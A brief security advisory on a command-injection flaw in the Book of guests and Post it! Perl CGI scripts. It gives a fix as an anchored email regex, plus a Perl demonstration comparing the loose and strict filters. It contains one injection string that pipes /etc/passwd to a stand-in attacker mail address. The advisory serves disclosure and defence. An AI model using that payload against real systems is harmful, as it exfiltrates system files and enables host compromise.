COMMAND

Book of guests & Post it!

SYSTEMS AFFECTED

PROBLEM

David Kumme found the following in Seth Leonard's Book of guests and Post it! CGIs, available at http://www.dreamcatchersweb.com/scripts/. The script does not filter ANY metacharacters out of its input before passing it to the shell. Therefore, by writing something like

    email@mail.com;cat /etc/passwd|mail evil@evilhost.com

into the email field, the attacker could take control of the host.

SOLUTION

Patch: first of all, it isn't a bad idea to set the permissions of the script correctly. Furthermore, the line

    if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... }

should be replaced by something like

    if ($INPUT{'email'} =~ /^[\w.-]+\@[\w.-]+$/) { ... }
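
The filter change described above, as an added example that is not part of the original advisory or of the scripts themselves: it runs the unanchored test and an anchored allowlist over a few constructed inputs, then hands only the accepted address to a program without going through a shell. The sub names, the sample addresses and the use of /bin/echo as a stand-in for the mailer are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Unanchored test quoted in the advisory: true for any string containing '@'.
sub loose_check  { my ($addr) = @_; return $addr =~ /(.*)\@(.*)/ ? 1 : 0; }

# Anchored allowlist in the spirit of the suggested fix. \A and \z are used
# instead of ^ and $ so that a trailing newline is rejected too.
sub strict_check { my ($addr) = @_; return $addr =~ /\A[\w.-]+\@[\w.-]+\z/ ? 1 : 0; }

# Constructed inputs; the second is the string from the advisory text.
my @samples = (
    'user@example.com',
    'email@mail.com;cat /etc/passwd|mail evil@evilhost.com',
    "user\@example.com\n",
    'no-at-sign.example.com',
);

for my $addr (@samples) {
    (my $shown = $addr) =~ s/\n/\\n/g;    # make the newline visible
    printf "%-56s loose=%d strict=%d\n",
        $shown, loose_check($addr), strict_check($addr);
}

# Defence in depth: the list form of system() execs the program directly,
# so no shell ever parses the address. /bin/echo stands in for the mailer.
for my $addr (grep { strict_check($_) } @samples) {
    system('/bin/echo', 'would send to:', $addr) == 0
        or warn "mailer stand-in failed: $?\n";
}
```

Only the first sample passes the anchored check; the unanchored test accepts the first three, including the string from the advisory.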